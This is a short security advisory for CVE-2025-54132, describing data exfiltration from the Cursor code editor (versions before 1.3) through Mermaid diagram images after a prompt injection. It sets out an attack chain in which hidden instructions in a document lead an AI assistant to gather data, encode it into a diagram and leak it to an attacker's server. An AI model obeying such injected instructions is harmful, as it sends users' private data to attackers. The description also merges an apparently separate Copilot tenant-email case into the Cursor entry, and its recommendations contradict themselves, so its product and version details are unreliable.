CVE-2025-54132

Name of the Vulnerable Software and Affected Versions Cursor versions prior to 1.3

Description Cursor is a code editor built for programming with AI. In versions below 1.3, Mermaid, a tool used for rendering diagrams, allows embedding images. An attacker can leverage this functionality to exfiltrate sensitive information to an attacker-controlled server through an image fetch following a successful prompt injection. A malicious model or backdoor could also trigger this exploit. The issue requires prompt injection from malicious data sources such as web content, image uploads, or source code. This can result in sensitive information being sent to an attacker-controlled external server. The vulnerability involves a combination of factors: Copilot can call tools like search enterprise emails within a tenant context and include the results in generated output, and Mermaid artifacts support clickable links, creating an unexpected exfiltration channel. The exploitation chain involves embedding hidden instructions in a document to collect data, Copilot gathering tenant data through available tools, the data being encoded and inserted into a Mermaid diagram, the diagram rendering as an interactive object with links, and a client or browser making a request to a command and control server when the link is clicked, allowing the attacker to collect the data.

Recommendations Versions prior to 1.3 should be updated to version 1.3. As a temporary workaround, consider disabling the Mermaid functionality until a patch is available. Restrict access to sensitive data sources used by Copilot. Block or filter external calls from the Mermaid renderer to prevent fetch, images, and iframe requests. Implement detection in eDiscovery or archived exports to identify Mermaid diagrams containing long hexadecimal strings and clickable links. Avoid clicking on unexpected interactive elements in reports or dialogues generated by Copilot.